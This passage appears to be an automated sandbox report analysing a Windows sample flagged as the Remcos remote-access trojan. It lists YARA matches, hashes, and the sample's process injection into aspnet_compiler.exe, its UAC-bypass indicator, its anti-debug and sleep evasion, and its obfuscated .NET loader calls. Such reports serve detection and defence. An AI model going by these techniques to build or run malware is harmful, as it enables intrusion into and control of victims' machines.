              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF814F23AAA0_2_00007FF814F23AAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004370404_2_00437040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004361CE4_2_004361CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004131DA4_2_004131DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0044C2494_2_0044C249
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004322514_2_00432251
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004263514_2_00426351
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041C46D4_2_0041C46D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004264BA4_2_004264BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004366034_2_00436603
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043C76D4_2_0043C76D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004257194_2_00425719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004347314_2_00434731
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004358BA4_2_004358BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004529D94_2_004529D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043C99C4_2_0043C99C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041DA054_2_0041DA05
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00436A384_2_00436A38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00444AF04_2_00444AF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043CBCB4_2_0043CBCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00451BAB4_2_00451BAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00425CA84_2_00425CA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00435DB64_2_00435DB6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043CE284_2_0043CE28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0043307B appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00402073 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433700 appears 54 times
              Source: file.exeStatic PE information: No import functions for PE file found
              Source: file.exe, 00000000.00000002.567234773.00000177EB320000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exe, 00000000.00000002.566970526.00000177E991C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe, 00000000.00000002.566934362.00000177E9842000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNBNNhH873.exe4 vs file.exe
              Source: file.exe, 00000000.00000002.564438533.000001778003B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenameNBNNhH873.exe4 vs file.exe
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeReversingLabs: Detection: 35%
              Source: file.exeVirustotal: Detection: 46%
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00416840 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00416840
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/2@1/5
              Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040E991 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,4_2_0040E991
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UQ90W9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041A003 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041A003
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: CEMENT.pdb source: file.exe, 00000000.00000002.567234773.00000177EB320000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.564438533.000001778003B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBNNhH873.pdb source: file.exe

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: file.exe, JLcALfheHFNKcZnPLt/EP1EGhU66g5S5M02Ye.cs.Net Code: Ref8At7ZI System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: file.exe, rU0ptD4llTJ1hV0R3g/X0fs42yqQa7Qy1FGHk.cs.Net Code: X0fs42yqQa7Qy1FGHk.rA1j5nF0vJo1tmjB8Xu(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), X0fs42yqQa7Qy1FGHk.rA1j5nF0vJo1tmjB8Xu(typeof(Type).TypeHandle) })
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000177E97B2C75 push FFFFFFBAh; iretd 0_2_00000177E97B2C7C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00456328 push eax; ret 4_2_00456346
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0045C51D push esi; ret 4_2_0045C526
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433746 push ecx; ret 4_2_00433759
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00455A06 push ecx; ret 4_2_00455A19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_0041B4C9
              Source: file.exeStatic PE information: 0xEACDEA53 [Sun Oct 31 11:36:51 2094 UTC]
              Source: initial sampleStatic PE information: section name: .text entropy: 7.511239938683684
              Source: file.exe, c2VdCkcfuulLVd3JSVN/dMdjZgcZKPfS5AC2lDf.csHigh entropy of concatenated method names: 'WcocIY8WWi', 'KHTcmWEX8l', 'ReIcHq3C21', 'rtAc6rInaP', 'SCxcOUCgho', 'HRxcCvZRpO', 'Ce4cNESpOo', '.ctor', '.cctor', 'B49EjuYwa6e1tR1hSn7'
              Source: file.exe, rU0ptD4llTJ1hV0R3g/X0fs42yqQa7Qy1FGHk.csHigh entropy of concatenated method names: '.cctor', 'X1reT73iit', 'Au7kmKk34', 'grrJKvsrg', 'RLK0bfYJn', 'MrGifVCYO', 'y84SWi6la', 'xJLo4XVgE', 'AlD1yfQTm', '.ctor'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406524 ShellExecuteW,URLDownloadToFileW,4_2_00406524
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_0041B4C9
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040ECEA Sleep,ExitProcess,4_2_0040ECEA
              Source: C:\Users\user\Desktop\file.exe TID: 5464Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 944Thread sleep count: 176 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 944Thread sleep time: -88000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_004192A3
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0044D0F9 FindFirstFileExA,4_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406EB0 FindFirstFileW,FindNextFileW,4_2_00406EB0
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_0040730B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_4-48098
              Source: file.exe, 00000000.00000002.564591902.00000177920B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HgfsSa/7Mz4
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bl%HgfsSa/7Mz4AIvfRNmLk/Cs/YU5W
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bVHgfsSa/7Mz4AIvfRNmLk/Cs/YU5W
              Source: aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bl%HgfsSa/7Mz4
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bVHgfsSa/7Mz4AIvfRNmLk/Cs/YU5WBLrwdvF/nOMbOXnxggMpO2I4rdwEEEPuX43KdCEpLr8hfjnvbzKgncgEFnjBxtlFg4TfjKuZ4Cr/qhLBl/Kscx8p3EhZQxAe2rApE/tcOjHfPhRncUf4Rk3/wAyaUcppDB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_0041B4C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00411241 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,4_2_00411241
              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00441B85 mov eax, dword ptr fs:[00000030h]4_2_00441B85
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433452 SetUnhandledExceptionFilter,4_2_00433452
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043A3F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043A3F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004338CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004338CC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46F000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 477000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47C000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B04008Jump to behavior
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_0041163A
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
